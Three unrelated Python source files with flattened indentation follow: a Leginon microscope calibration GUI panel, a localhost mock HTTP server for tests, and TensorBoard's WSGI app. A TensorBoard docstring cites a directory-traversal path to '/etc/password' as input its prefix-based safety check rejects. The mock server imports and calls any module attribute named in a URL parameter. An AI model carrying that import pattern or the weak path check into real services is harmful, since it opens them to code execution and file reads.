| source | python |
|---|---|
Calibrator.py
|
# The Leginon software is Copyright 2004
# The Scripps Research Institute, La Jolla, CA
# For terms of the license agreement
# see http://ami.scripps.edu/software/leginon-license
#
import threading
import wx
from leginon.gui.wx.Choice import Choice
from leginon.gui.wx.Entry import FloatEntry
import leginon.gui.wx.Camera
import leginon.gui.wx.Events
import leginon.gui.wx.TargetPanel
import leginon.gui.wx.Node
import leginon.gui.wx.Settings
import leginon.gui.wx.ToolBar
import leginon.gui.wx.Instrument
class SettingsDialog(leginon.gui.wx.Settings.Dialog):
def initialize(self):
return ScrolledSettings(self,self.scrsize,False,False)
class ScrolledSettings(leginon.gui.wx.Settings.ScrolledDialog):
def initialize(self):
leginon.gui.wx.Settings.ScrolledDialog.initialize(self)
sb = wx.StaticBox(self, -1, 'Calibration')
sbsz = wx.StaticBoxSizer(sb, wx.VERTICAL)
if self.show_basic:
sz = self.addBasicSettings()
else:
sz = self.addSettings()
sbsz.Add(sz, 0, wx.ALIGN_CENTER|wx.EXPAND|wx.ALL, 5)
return [sbsz]
def addBasicSettings(self):
self.widgets['override preset'] = wx.CheckBox(self, -1, 'Override Preset')
sz = wx.GridBagSizer(5, 5)
sz.Add(self.widgets['override preset'], (0, 0), (1, 1), wx.ALIGN_CENTER_VERTICAL)
sz.AddGrowableCol(0)
return sz
def addSettings(self):
self.widgets['correlation type'] = Choice(self, -1, choices=self.node.cortypes)
self.widgets['override preset'] = wx.CheckBox(self, -1, 'Override Preset')
self.widgets['instruments'] = leginon.gui.wx.Instrument.SelectionPanel(self)
self.panel.setInstrumentSelection(self.widgets['instruments'])
self.widgets['camera settings'] = leginon.gui.wx.Camera.CameraPanel(self)
self.widgets['camera settings'].setGeometryLimits({'size':self.node.instrument.camerasize,'binnings':self.node.instrument.camerabinnings,'binmethod':self.node.instrument.camerabinmethod})
szcor = wx.GridBagSizer(5, 5)
label = wx.StaticText(self, -1, 'Use')
szcor.Add(label, (0, 0), (1, 1), wx.ALIGN_CENTER_VERTICAL)
szcor.Add(self.widgets['correlation type'], (0, 1), (1, 1), wx.ALIGN_CENTER_VERTICAL)
label = wx.StaticText(self, -1, 'correlation')
szcor.Add(label, (0, 2), (1, 1), wx.ALIGN_CENTER_VERTICAL)
szlpf = wx.GridBagSizer(5, 5)
label = wx.StaticText(self, -1, 'phase correlation low pass filter')
szlpf.Add(label, (0, 0), (1, 3), wx.ALIGN_CENTER_VERTICAL)
label = wx.StaticText(self, -1, 'sigma:')
szlpf.Add(label, (1, 0), (1, 1), wx.ALIGN_CENTER_VERTICAL)
self.widgets['phase corr lpf sigma'] = FloatEntry(self, -1,
min=0.0, chars=4)
szlpf.Add(self.widgets['phase corr lpf sigma'], (1, 1), (1, 1), wx.ALIGN_CENTER_VERTICAL)
label = wx.StaticText(self, -1, 'pixels')
szlpf.Add(label, (1, 2), (1, 1), wx.ALIGN_CENTER_VERTICAL)
sz = wx.GridBagSizer(5, 5)
sz.Add(szcor, (0, 0), (1, 1), wx.ALIGN_CENTER_VERTICAL)
sz.Add(szlpf, (1, 0), (1, 1), wx.ALIGN_CENTER_VERTICAL)
sz.Add(self.widgets['override preset'], (2, 0), (1, 1), wx.ALIGN_CENTER_VERTICAL)
sz.Add(self.widgets['instruments'], (3, 0), (1, 1), wx.ALIGN_CENTER_VERTICAL)
sz.Add(self.widgets['camera settings'], (0, 1), (4, 1), wx.ALIGN_CENTER|wx.EXPAND)
sz.AddGrowableRow(3)
sz.AddGrowableCol(0)
sz.AddGrowableCol(1)
return sz
class Panel(leginon.gui.wx.Node.Panel, leginon.gui.wx.Instrument.SelectionMixin):
imageclass = leginon.gui.wx.TargetPanel.TargetImagePanel
settingsdialogclass = SettingsDialog
def __init__(self, *args, **kwargs):
leginon.gui.wx.Node.Panel.__init__(self, *args, **kwargs)
leginon.gui.wx.Instrument.SelectionMixin.__init__(self)
self.toolbar.AddTool(leginon.gui.wx.ToolBar.ID_SETTINGS,
'settings',
shortHelpString='Settings')
self.toolbar.AddSeparator()
self.toolbar.AddTool(leginon.gui.wx.ToolBar.ID_ACQUIRE,
'acquire',
shortHelpString='Acquire Image')
self.toolbar.AddSeparator()
self.toolbar.AddTool(leginon.gui.wx.ToolBar.ID_CALIBRATE,
'play',
shortHelpString='Calibrate')
self.toolbar.AddTool(leginon.gui.wx.ToolBar.ID_ABORT,
'stop',
shortHelpString='Abort')
self.toolbar.EnableTool(leginon.gui.wx.ToolBar.ID_ABORT, False)
self.initialize()
self.Bind(leginon.gui.wx.Events.EVT_CALIBRATION_DONE, self.onCalibrationDone)
self.SetSizer(self.szmain)
self.SetAutoLayout(True)
self.SetupScrolling()
def initialize(self):
# image
self.imagepanel = self.imageclass(self, -1)
self.imagepanel.addTypeTool('Image', display=True)
self.imagepanel.selectiontool.setDisplayed('Image', True)
self.imagepanel.addTypeTool('Correlation', display=True)
if isinstance(self.imagepanel, leginon.gui.wx.TargetPanel.TargetImagePanel):
color = wx.Colour(255, 128, 0)
self.imagepanel.addTargetTool('Peak', color)
self.szmain.Add(self.imagepanel, (0, 0), (1, 1), wx.EXPAND)
self.szmain.AddGrowableRow(0)
self.szmain.AddGrowableCol(0)
def onNodeInitialized(self):
leginon.gui.wx.Instrument.SelectionMixin.onNodeInitialized(self)
self.toolbar.Bind(wx.EVT_TOOL, self.onSettingsTool,
id=leginon.gui.wx.ToolBar.ID_SETTINGS)
self.toolbar.Bind(wx.EVT_TOOL, self.onAcquireTool,
id=leginon.gui.wx.ToolBar.ID_ACQUIRE)
self.toolbar.Bind(wx.EVT_TOOL, self.onCalibrateTool,
id=leginon.gui.wx.ToolBar.ID_CALIBRATE)
self.toolbar.Bind(wx.EVT_TOOL, self.onAbortTool,
id=leginon.gui.wx.ToolBar.ID_ABORT)
def _acquisitionEnable(self, enable):
self.toolbar.Enable(enable)
def onAcquisitionDone(self, evt):
self._acquisitionEnable(True)
def _calibrationEnable(self, enable):
self.toolbar.Enable(enable)
def onCalibrationDone(self, evt):
self._calibrationEnable(True)
def calibrationDone(self):
evt = leginon.gui.wx.Events.CalibrationDoneEvent()
self.GetEventHandler().AddPendingEvent(evt)
def onAcquireTool(self, evt):
self._acquisitionEnable(False)
threading.Thread(target=self.node.acquireImage).start()
def onSettingsTool(self, evt):
dialog = self.settingsdialogclass(self,show_basic=True)
dialog.ShowModal()
dialog.Destroy()
def onCalibrateTool(self, evt):
raise NotImplementedError
def onAbortTool(self, evt):
raise NotImplementedError
if __name__ == '__main__':
class FakeInstrument(object):
def __init__(self):
self.camerasize = {'x': 1024, 'y': 1024}
class FakeNode(object):
def __init__(self):
self.cortypes = ['foo', 'bar']
self.instrument = FakeInstrument()
def getSettings(self):
return {}
class FakePanel(wx.Panel):
def __init__(self, *args, **kwargs):
wx.Panel.__init__(self, *args, **kwargs)
self.node = FakeNode()
def setInstrumentSelection(self, widget):
widget.setTEMs(['foo longer name', 'bar'])
widget.setTEM('foo longer name')
widget.setCCDCameras(['foo longer name', 'bar'])
widget.setCCDCamera('bar')
class App(wx.App):
def OnInit(self):
frame = wx.Frame(None, -1, 'Calibration Test')
panel = FakePanel(frame, -1)
dialog = SettingsDialog(panel, 'Test')
self.SetTopWindow(frame)
frame.Show()
dialog.ShowModal()
return True
app = App(0)
app.MainLoop()
|
mock_remote_server.py
|
"""
An HTTP server that listens on localhost and returns a variety of responses for
mocking remote servers.
"""
from builtins import str
from builtins import range
from builtins import object
from contextlib import contextmanager
from threading import Thread
from time import sleep
from wsgiref.simple_server import make_server
from future.moves.urllib.request import urlopen
import socket
import os
from functools import reduce
class MockHTTPServer(object):
"""
Mock HTTP server that can take the place of a remote server for testing
fetching of remote resources.
Uses contextmanager to allow easy setup and teardown of the WSGI server in
a separate thread, eg::
>>> with MockEchoTestServer().serve() as server_address:
...     urlopen(server_address)
...
Subclass this and override __call__ to provide your own WSGI handler function.
"""
def __call__(self, environ, start_response):
raise NotImplementedError()
@contextmanager
def serve(self, host='localhost', port_range=(8000, 9000)):
"""
Start an instance of wsgiref.simple_server set up to handle requests in
a separate daemon thread.
Return the address of the server, e.g. 'http://localhost:8000'.
This uses a context manager to make sure the server is stopped::
>>> with MockEchoTestServer().serve() as addr:
...     print(urlopen('%s/?content=hello+world' % addr).read())
...
'hello world'
"""
for port in range(*port_range):
try:
server = make_server(host, port, self)
except socket.error:
continue
break
else:
raise Exception("Could not bind to a port in range %r" % (port_range,))
serving = True
def _serve_until_stopped():
while serving:
server.handle_request()
thread = Thread(target=_serve_until_stopped)
thread.daemon = True
thread.start()
try:
yield 'http://%s:%d' % (host, port)
finally:
serving = False
# Call the server to make sure the waiting handle_request()
# call completes. Set a very small timeout as we don't actually need to
# wait for a response. We don't care about exceptions here either.
try:
urlopen("http://%s:%s/" % (host, port), timeout=0.01)
except Exception:
pass
@classmethod
def get_content(cls, varspec):
"""
Return the value of the variable at varspec, which must be in the
format 'package.module:variable'. If variable is callable, it will be
called and its return value used.
"""
modpath, var = varspec.split(':')
mod = reduce(getattr, modpath.split('.')[1:], __import__(modpath))
var = reduce(getattr, var.split('.'), mod)
try:
return var()
except TypeError:
return var
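# Illustrative call (hypothetical, not part of the original module), resolving a
# 'package.module:variable' spec against the standard library:
#
#   MockHTTPServer.get_content('os.path:sep')   # -> '/' on POSIX
#
# __import__('os.path') returns the top-level 'os' package, getattr walks to
# 'os.path', and since os.path.sep is not callable the TypeError branch returns
# it unchanged.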
class MockEchoTestServer(MockHTTPServer):
"""
WSGI application that echoes back the status, headers and
content passed via the URL, e.g.:
a 500 error response: 'http://localhost/?status=500'
a 200 OK response, returning the function's docstring:
'http://localhost/?status=200;content-type=text/plain;content_var
=ckan.tests.lib.test_package_search:test_wsgi_app.__doc__'
To specify content, use:
content=string
content_var=package.module:variable
"""
def __call__(self, environ, start_response):
from http.client import responses
from webob import Request
request = Request(environ)
status = int(request.str_params.get('status', '200'))
# if 'redirect' in redirect.str_params:
# params = dict([(key, value) for param in request.str_params \
# if key != 'redirect'])
# redirect_status = int(request.str_params['redirect'])
# status = int(request.str_params.get('status', '200'))
# resp = make_response(render_template('error.html'), redirect_status)
# resp.headers['Location'] = url_for(request.path, params)
# return resp
if 'content_var' in request.str_params:
content = request.str_params.get('content_var')
content = self.get_content(content)
elif 'content_long' in request.str_params:
content = '*' * 1000001
else:
content = request.str_params.get('content', '')
if 'method' in request.str_params \
and request.method.lower() != request.str_params['method'].lower():
content = ''
status = 405
if isinstance(content, str):
raise TypeError("Expected raw byte string for content")
headers = [
item
for item in list(request.str_params.items())
if item[0] not in ('content', 'status')
]
if 'length' in request.str_params:
cl = request.str_params.get('length')
headers += [('Content-Length', cl)]
elif content and 'no-content-length' not in request.str_params:
headers += [('Content-Length', str(len(content)))]
start_response(
'%d %s' % (status, responses[status]),
headers
)
return [content]
class MockTimeoutTestServer(MockHTTPServer):
"""
Sleeps ``timeout`` seconds before responding. Make sure the client timeout you
test with is less than this value so the request actually times out.
"""
def __init__(self, timeout):
super(MockTimeoutTestServer, self).__init__()
self.timeout = timeout
def __call__(self, environ, start_response):
# Sleep until self.timeout or the parent thread finishes
sleep(self.timeout)
start_response('200 OK', [('Content-Type', 'text/plain')])
return ['xyz']
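# Minimal usage sketch (assumed, not part of the original module): pair the
# server's delay with a shorter client timeout so the request raises instead of
# blocking.
#
#   with MockTimeoutTestServer(timeout=2).serve() as addr:
#       urlopen(addr, timeout=0.5)   # expected to raise a timeout error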
def get_file_content(data_filename):
filepath = os.path.join(os.path.dirname(__file__), 'data', data_filename)
assert os.path.exists(filepath), filepath
with open(filepath, 'rb') as f:
return f.read()
class MockWmsServer(MockHTTPServer):
"""Acts like an OGC WMS server (well, one basic call)
"""
def __init__(self, wms_version='1.3'):
self.wms_version = wms_version
super(MockWmsServer, self).__init__()
def __call__(self, environ, start_response):
from http.client import responses
from webob import Request
request = Request(environ)
status = int(request.str_params.get('status', '200'))
headers = {'Content-Type': 'text/plain'}
# e.g. params ?service=WMS&request=GetCapabilities&version=1.1.1
if request.str_params.get('service') != 'WMS':
status = 200
content = ERROR_WRONG_SERVICE
elif request.str_params.get('request') != 'GetCapabilities':
status = 405
content = '"request" param wrong'
elif 'version' in request.str_params and \
request.str_params.get('version') != self.wms_version:
status = 405
content = '"version" not compatible - need to be %s' % self.wms_version
elif self.wms_version == '1.1.1':
status = 200
content = get_file_content('wms_getcap_1.1.1.xml')
elif self.wms_version == '1.3':
status = 200
content = get_file_content('wms_getcap_1.3.xml')
start_response(
'%d %s' % (status, responses[status]),
list(headers.items())
)
return [content]
class MockWfsServer(MockHTTPServer):
"""Acts like an OGC WFS server (well, one basic call)
"""
def __init__(self):
super(MockWfsServer, self).__init__()
def __call__(self, environ, start_response):
from http.client import responses
from webob import Request
request = Request(environ)
status = int(request.str_params.get('status', '200'))
headers = {'Content-Type': 'text/plain'}
# e.g. params ?service=WFS&request=GetCapabilities
if request.str_params.get('service') != 'WFS':
status = 200
content = ERROR_WRONG_SERVICE
elif request.str_params.get('request') != 'GetCapabilities':
status = 405
content = '"request" param wrong'
else:
status = 200
content = get_file_content('wfs_getcap.xml')
start_response(
'%d %s' % (status, responses[status]),
list(headers.items())
)
return [content]
ERROR_WRONG_SERVICE = "<ows:ExceptionReport version='1.1.0' language='en'" \
" xmlns:ows='http://www.opengis.net/ows'><ows:Exception exceptionCode='NoApplicableCode'>" \
"<ows:ExceptionText>Wrong service type.</ows:ExceptionText></ows:Exception></ows:ExceptionReport>"
|
application.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""TensorBoard WSGI Application Logic.
TensorBoardApplication constructs TensorBoard as a WSGI application.
It handles serving static assets, and implements TensorBoard data APIs.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import csv
import imghdr
import mimetypes
import os
import re
import threading
import time
import six
from six import StringIO
from six.moves import urllib
from six.moves import xrange # pylint: disable=redefined-builtin
from six.moves.urllib import parse as urlparse
from werkzeug import wrappers
from tensorflow.python.platform import resource_loader
from tensorflow.python.platform import tf_logging as logging
from tensorflow.tensorboard.backend import http_util
from tensorflow.tensorboard.backend import process_graph
from tensorflow.tensorboard.backend.event_processing import event_accumulator
from tensorflow.tensorboard.backend.event_processing import event_multiplexer
from tensorflow.tensorboard.plugins.debugger import debugger_plugin
from tensorflow.tensorboard.plugins.projector import projector_plugin
from tensorflow.tensorboard.plugins.text import text_plugin
DEFAULT_SIZE_GUIDANCE = {
event_accumulator.COMPRESSED_HISTOGRAMS: 500,
event_accumulator.IMAGES: 10,
event_accumulator.AUDIO: 10,
event_accumulator.SCALARS: 1000,
event_accumulator.HEALTH_PILLS: 100,
event_accumulator.HISTOGRAMS: 50,
}
DATA_PREFIX = '/data'
LOGDIR_ROUTE = '/logdir'
RUNS_ROUTE = '/runs'
PLUGIN_PREFIX = '/plugin'
SCALARS_ROUTE = '/' + event_accumulator.SCALARS
IMAGES_ROUTE = '/' + event_accumulator.IMAGES
AUDIO_ROUTE = '/' + event_accumulator.AUDIO
HISTOGRAMS_ROUTE = '/' + event_accumulator.HISTOGRAMS
COMPRESSED_HISTOGRAMS_ROUTE = '/' + event_accumulator.COMPRESSED_HISTOGRAMS
INDIVIDUAL_IMAGE_ROUTE = '/individualImage'
INDIVIDUAL_AUDIO_ROUTE = '/individualAudio'
GRAPH_ROUTE = '/' + event_accumulator.GRAPH
RUN_METADATA_ROUTE = '/' + event_accumulator.RUN_METADATA
TAB_ROUTES = ['', '/events', '/images', '/audio', '/graphs', '/histograms']
_IMGHDR_TO_MIMETYPE = {
'bmp': 'image/bmp',
'gif': 'image/gif',
'jpeg': 'image/jpeg',
'png': 'image/png'
}
_DEFAULT_IMAGE_MIMETYPE = 'application/octet-stream'
def _content_type_for_image(encoded_image_string):
image_type = imghdr.what(None, encoded_image_string)
return _IMGHDR_TO_MIMETYPE.get(image_type, _DEFAULT_IMAGE_MIMETYPE)
class _OutputFormat(object):
"""An enum used to list the valid output formats for API calls.
Not all API calls support all formats (for example, only scalars and
compressed histograms support CSV).
"""
JSON = 'json'
CSV = 'csv'
def standard_tensorboard_wsgi(logdir, purge_orphaned_data, reload_interval):
"""Construct a TensorBoardWSGIApp with standard plugins and multiplexer."""
multiplexer = event_multiplexer.EventMultiplexer(
size_guidance=DEFAULT_SIZE_GUIDANCE,
purge_orphaned_data=purge_orphaned_data)
plugins = [
debugger_plugin.DebuggerPlugin(),
projector_plugin.ProjectorPlugin(),
text_plugin.TextPlugin(),
]
return TensorBoardWSGIApp(logdir, plugins, multiplexer, reload_interval)
class TensorBoardWSGIApp(object):
"""The TensorBoard application, conforming to WSGI spec."""
# How many samples to include in sampling API calls by default.
DEFAULT_SAMPLE_COUNT = 10
# NOTE TO MAINTAINERS: An accurate Content-Length MUST be specified on all
# responses using send_header.
protocol_version = 'HTTP/1.1'
def __init__(self, logdir, plugins, multiplexer, reload_interval):
"""Constructs the TensorBoard application.
Args:
logdir: the logdir spec that describes where data will be loaded.
May be a directory, a comma-separated list of directories, or a list of
'name:/path' entries that provide named directories.
plugins: List of plugins that extend tensorboard.plugins.BasePlugin
multiplexer: The EventMultiplexer with TensorBoard data to serve
reload_interval: How often (in seconds) to reload the Multiplexer
Returns:
A WSGI application that implements the TensorBoard backend.
Raises:
ValueError: If some plugin has no plugin_name
ValueError: If two plugins have the same plugin_name
"""
self._logdir = logdir
self._plugins = plugins
self._multiplexer = multiplexer
self.tag = get_tensorboard_tag()
path_to_run = parse_event_files_spec(self._logdir)
if reload_interval:
start_reloading_multiplexer(self._multiplexer, path_to_run,
reload_interval)
else:
reload_multiplexer(self._multiplexer, path_to_run)
self.data_applications = {
DATA_PREFIX + LOGDIR_ROUTE:
self._serve_logdir,
DATA_PREFIX + SCALARS_ROUTE:
self._serve_scalars,
DATA_PREFIX + GRAPH_ROUTE:
self._serve_graph,
DATA_PREFIX + RUN_METADATA_ROUTE:
self._serve_run_metadata,
DATA_PREFIX + HISTOGRAMS_ROUTE:
self._serve_histograms,
DATA_PREFIX + COMPRESSED_HISTOGRAMS_ROUTE:
self._serve_compressed_histograms,
DATA_PREFIX + IMAGES_ROUTE:
self._serve_images,
DATA_PREFIX + INDIVIDUAL_IMAGE_ROUTE:
self._serve_image,
DATA_PREFIX + AUDIO_ROUTE:
self._serve_audio,
DATA_PREFIX + INDIVIDUAL_AUDIO_ROUTE:
self._serve_individual_audio,
DATA_PREFIX + RUNS_ROUTE:
self._serve_runs,
'/app.js':
self._serve_js
}
# Serve the routes from the registered plugins using their name as the route
# prefix. For example if plugin z has two routes /a and /b, they will be
# served as /data/plugin/z/a and /data/plugin/z/b.
plugin_names_encountered = set()
for plugin in self._plugins:
if plugin.plugin_name is None:
raise ValueError('Plugin %s has no plugin_name' % plugin)
if plugin.plugin_name in plugin_names_encountered:
raise ValueError('Duplicate plugins for name %s' % plugin.plugin_name)
plugin_names_encountered.add(plugin.plugin_name)
try:
plugin_apps = plugin.get_plugin_apps(self._multiplexer, self._logdir)
except Exception as e: # pylint: disable=broad-except
logging.warning('Plugin %s failed. Exception: %s', plugin.plugin_name,
str(e))
continue
for route, app in plugin_apps.items():
path = DATA_PREFIX + PLUGIN_PREFIX + '/' + plugin.plugin_name + route
self.data_applications[path] = app
# We use underscore_names for consistency with inherited methods.
def _image_response_for_run(self, run_images, run, tag):
"""Builds a JSON-serializable object with information about run_images.
Args:
run_images: A list of event_accumulator.ImageValueEvent objects.
run: The name of the run.
tag: The name of the tag the images all belong to.
Returns:
A list of dictionaries containing the wall time, step, URL, width, and
height for each image.
"""
response = []
for index, run_image in enumerate(run_images):
response.append({
'wall_time': run_image.wall_time,
'step': run_image.step,
# We include the size so that the frontend can add that to the <img>
# tag so that the page layout doesn't change when the image loads.
'width': run_image.width,
'height': run_image.height,
'query': self._query_for_individual_image(run, tag, index)
})
return response
def _audio_response_for_run(self, run_audio, run, tag):
"""Builds a JSON-serializable object with information about run_audio.
Args:
run_audio: A list of event_accumulator.AudioValueEvent objects.
run: The name of the run.
tag: The name of the tag the images all belong to.
Returns:
A list of dictionaries containing the wall time, step, URL, and
content_type for each audio clip.
"""
response = []
for index, run_audio_clip in enumerate(run_audio):
response.append({
'wall_time': run_audio_clip.wall_time,
'step': run_audio_clip.step,
'content_type': run_audio_clip.content_type,
'query': self._query_for_individual_audio(run, tag, index)
})
return response
def _path_is_safe(self, path):
"""Check path is safe (stays within current directory).
This is for preventing directory-traversal attacks.
Args:
path: The path to check for safety.
Returns:
True if the given path stays within the current directory, and false
if it would escape to a higher directory. E.g. _path_is_safe('index.html')
returns true, but _path_is_safe('../../../etc/password') returns false.
"""
base = os.path.abspath(os.curdir)
absolute_path = os.path.abspath(path)
prefix = os.path.commonprefix([base, absolute_path])
return prefix == base
@wrappers.Request.application
def _serve_logdir(self, request):
"""Respond with a JSON object containing this TensorBoard's logdir."""
return http_util.Respond(
request, {'logdir': self._logdir}, 'application/json')
@wrappers.Request.application
def _serve_scalars(self, request):
"""Given a tag and single run, return array of ScalarEvents."""
# TODO(cassandrax): return HTTP status code for malformed requests
tag = request.args.get('tag')
run = request.args.get('run')
values = self._multiplexer.Scalars(run, tag)
if request.args.get('format') == _OutputFormat.CSV:
string_io = StringIO()
writer = csv.writer(string_io)
writer.writerow(['Wall time', 'Step', 'Value'])
writer.writerows(values)
return http_util.Respond(request, string_io.getvalue(), 'text/csv')
else:
return http_util.Respond(request, values, 'application/json')
@wrappers.Request.application
def _serve_graph(self, request):
"""Given a single run, return the graph definition in json format."""
run = request.args.get('run', None)
if run is None:
return http_util.Respond(
request, 'query parameter "run" is required', 'text/plain', 400)
try:
graph = self._multiplexer.Graph(run)
except ValueError:
return http_util.Respond(
request, '404 Not Found', 'text/plain; charset=UTF-8', code=404)
limit_attr_size = request.args.get('limit_attr_size', None)
if limit_attr_size is not None:
try:
limit_attr_size = int(limit_attr_size)
except ValueError:
return http_util.Respond(
request, 'query parameter `limit_attr_size` must be integer',
'text/plain', 400)
large_attrs_key = request.args.get('large_attrs_key', None)
try:
process_graph.prepare_graph_for_ui(graph, limit_attr_size,
large_attrs_key)
except ValueError as e:
return http_util.Respond(request, e.message, 'text/plain', 400)
return http_util.Respond(request, str(graph), 'text/x-protobuf') # pbtxt
@wrappers.Request.application
def _serve_run_metadata(self, request):
"""Given a tag and a TensorFlow run, return the session.run() metadata."""
tag = request.args.get('tag', None)
run = request.args.get('run', None)
if tag is None:
return http_util.Respond(
request, 'query parameter "tag" is required', 'text/plain', 400)
if run is None:
return http_util.Respond(
request, 'query parameter "run" is required', 'text/plain', 400)
try:
run_metadata = self._multiplexer.RunMetadata(run, tag)
except ValueError:
return http_util.Respond(
request, '404 Not Found', 'text/plain; charset=UTF-8', code=404)
return http_util.Respond(
request, str(run_metadata), 'text/x-protobuf') # pbtxt
@wrappers.Request.application
def _serve_histograms(self, request):
"""Given a tag and single run, return an array of histogram values."""
tag = request.args.get('tag')
run = request.args.get('run')
values = self._multiplexer.Histograms(run, tag)
return http_util.Respond(request, values, 'application/json')
@wrappers.Request.application
def _serve_compressed_histograms(self, request):
"""Given a tag and single run, return an array of compressed histograms."""
tag = request.args.get('tag')
run = request.args.get('run')
compressed_histograms = self._multiplexer.CompressedHistograms(run, tag)
if request.args.get('format') == _OutputFormat.CSV:
string_io = StringIO()
writer = csv.writer(string_io)
# Build the headers; we have two columns for timing and two columns for
# each compressed histogram bucket.
headers = ['Wall time', 'Step']
if compressed_histograms:
bucket_count = len(compressed_histograms[0].compressed_histogram_values)
for i in xrange(bucket_count):
headers += ['Edge %d basis points' % i, 'Edge %d value' % i]
writer.writerow(headers)
for compressed_histogram in compressed_histograms:
row = [compressed_histogram.wall_time, compressed_histogram.step]
for value in compressed_histogram.compressed_histogram_values:
row += [value.rank_in_bps, value.value]
writer.writerow(row)
return http_util.Respond(request, string_io.getvalue(), 'text/csv')
else:
return http_util.Respond(
request, compressed_histograms, 'application/json')
@wrappers.Request.application
def _serve_images(self, request):
"""Given a tag and list of runs, serve a list of images.
Note that the images themselves are not sent; instead, we respond with URLs
to the images. The frontend should treat these URLs as opaque and should not
try to parse information about them or generate them itself, as the format
may change.
Args:
request: A werkzeug.wrappers.Request object.
Returns:
A werkzeug.Response application.
"""
tag = request.args.get('tag')
run = request.args.get('run')
images = self._multiplexer.Images(run, tag)
response = self._image_response_for_run(images, run, tag)
return http_util.Respond(request, response, 'application/json')
@wrappers.Request.application
def _serve_image(self, request):
"""Serves an individual image."""
tag = request.args.get('tag')
run = request.args.get('run')
index = int(request.args.get('index'))
image = self._multiplexer.Images(run, tag)[index]
encoded_image_string = image.encoded_image_string
content_type = _content_type_for_image(encoded_image_string)
return http_util.Respond(request, encoded_image_string, content_type)
def _query_for_individual_image(self, run, tag, index):
"""Builds a URL for accessing the specified image.
This should be kept in sync with _serve_image. Note that the URL is *not*
guaranteed to always return the same image, since images may be unloaded
from the reservoir as new images come in.
Args:
run: The name of the run.
tag: The tag.
index: The index of the image. Negative values are OK.
Returns:
A string representation of a URL that will load the index-th
sampled image in the given run with the given tag.
"""
query_string = urllib.parse.urlencode({
'run': run,
'tag': tag,
'index': index
})
return query_string
@wrappers.Request.application
def _serve_audio(self, request):
"""Given a tag and list of runs, serve a list of audio.
Note that the audio clips themselves are not sent; instead, we respond with
URLs to the audio. The frontend should treat these URLs as opaque and should
not try to parse information about them or generate them itself, as the
format may change.
Args:
request: A werkzeug.wrappers.Request object.
Returns:
A werkzeug.Response application.
"""
tag = request.args.get('tag')
run = request.args.get('run')
audio_list = self._multiplexer.Audio(run, tag)
response = self._audio_response_for_run(audio_list, run, tag)
return http_util.Respond(request, response, 'application/json')
@wrappers.Request.application
def _serve_individual_audio(self, request):
"""Serves an individual audio clip."""
tag = request.args.get('tag')
run = request.args.get('run')
index = int(request.args.get('index'))
audio = self._multiplexer.Audio(run, tag)[index]
return http_util.Respond(
request, audio.encoded_audio_string, audio.content_type)
def _query_for_individual_audio(self, run, tag, index):
"""Builds a URL for accessing the specified audio.
This should be kept in sync with _serve_individual_audio. Note that the URL
is *not* guaranteed to always return the same audio, since audio may be
unloaded from the reservoir as new audio comes in.
Args:
run: The name of the run.
tag: The tag.
index: The index of the audio. Negative values are OK.
Returns:
A string representation of a URL that will load the index-th
sampled audio in the given run with the given tag.
"""
query_string = urllib.parse.urlencode({
'run': run,
'tag': tag,
'index': index
})
return query_string
@wrappers.Request.application
def _serve_runs(self, request):
"""WSGI app serving a JSON object about runs and tags.
Returns a mapping from runs to tagType to list of tags for that run.
Args:
request: A werkzeug request
Returns:
A werkzeug Response with the following content:
{runName: {images: [tag1, tag2, tag3],
audio: [tag4, tag5, tag6],
scalars: [tagA, tagB, tagC],
histograms: [tagX, tagY, tagZ],
firstEventTimestamp: 123456.789}}
"""
runs = self._multiplexer.Runs()
for run_name, run_data in runs.items():
try:
run_data['firstEventTimestamp'] = self._multiplexer.FirstEventTimestamp(
run_name)
except ValueError:
logging.warning('Unable to get first event timestamp for run %s',
run_name)
run_data['firstEventTimestamp'] = None
return http_util.Respond(request, runs, 'application/json')
@wrappers.Request.application
def _serve_index(self, request):
"""Serves the index page (i.e., the tensorboard app itself)."""
return self._serve_static_file(request, '/dist/index.html')
@wrappers.Request.application
def _serve_js(self, request):
"""Serves the JavaScript for the index page."""
return self._serve_static_file(request, '/dist/app.js')
def _serve_static_file(self, request, path):
"""Serves the static file located at the given path.
Args:
request: A werkzeug Request
path: The path of the static file, relative to the tensorboard/ directory.
Returns:
A werkzeug.Response application.
"""
# Strip off the leading forward slash.
orig_path = path.lstrip('/')
if not self._path_is_safe(orig_path):
logging.warning('path not safe: %s', orig_path)
return http_util.Respond(request, 'Naughty naughty!', 'text/plain', 400)
# Resource loader wants a path relative to //WORKSPACE/tensorflow.
path = os.path.join('tensorboard', orig_path)
# Open the file and read it.
try:
contents = resource_loader.load_resource(path)
except IOError:
# For compatibility with latest version of Bazel, we renamed bower
# packages to use '_' rather than '-' in their package name.
# This means that the directory structure is changed too.
# So that all our recursive imports work, we need to modify incoming
# requests to map onto the new directory structure.
path = orig_path
components = path.split('/')
components[0] = components[0].replace('-', '_')
path = ('/').join(components)
# Bazel keeps all the external dependencies in //WORKSPACE/external.
# and resource loader wants a path relative to //WORKSPACE/tensorflow/.
path = os.path.join('../external', path)
try:
contents = resource_loader.load_resource(path)
except IOError:
logging.warning('path %s not found, sending 404', path)
return http_util.Respond(request, 'Not found', 'text/plain', code=404)
mimetype, content_encoding = mimetypes.guess_type(path)
mimetype = mimetype or 'application/octet-stream'
return http_util.Respond(
request,
contents,
mimetype,
expires=3600,
content_encoding=content_encoding)
def __call__(self, environ, start_response): # pylint: disable=invalid-name
"""Central entry point for the TensorBoard application.
This method handles routing to sub-applications. It does simple routing
using regular expression matching.
This __call__ method conforms to the WSGI spec, so that instances of this
class are WSGI applications.
Args:
environ: See WSGI spec.
start_response: See WSGI spec.
Returns:
A werkzeug Response.
"""
request = wrappers.Request(environ)
parsed_url = urlparse.urlparse(request.path)
# Remove a trailing slash, if present.
clean_path = parsed_url.path
if clean_path.endswith('/'):
clean_path = clean_path[:-1]
# pylint: disable=too-many-function-args
if clean_path in self.data_applications:
return self.data_applications[clean_path](environ, start_response)
elif clean_path in TAB_ROUTES:
return self._serve_index(environ, start_response)
else:
return self._serve_static_file(request, clean_path)(environ,
start_response)
# pylint: enable=too-many-function-args
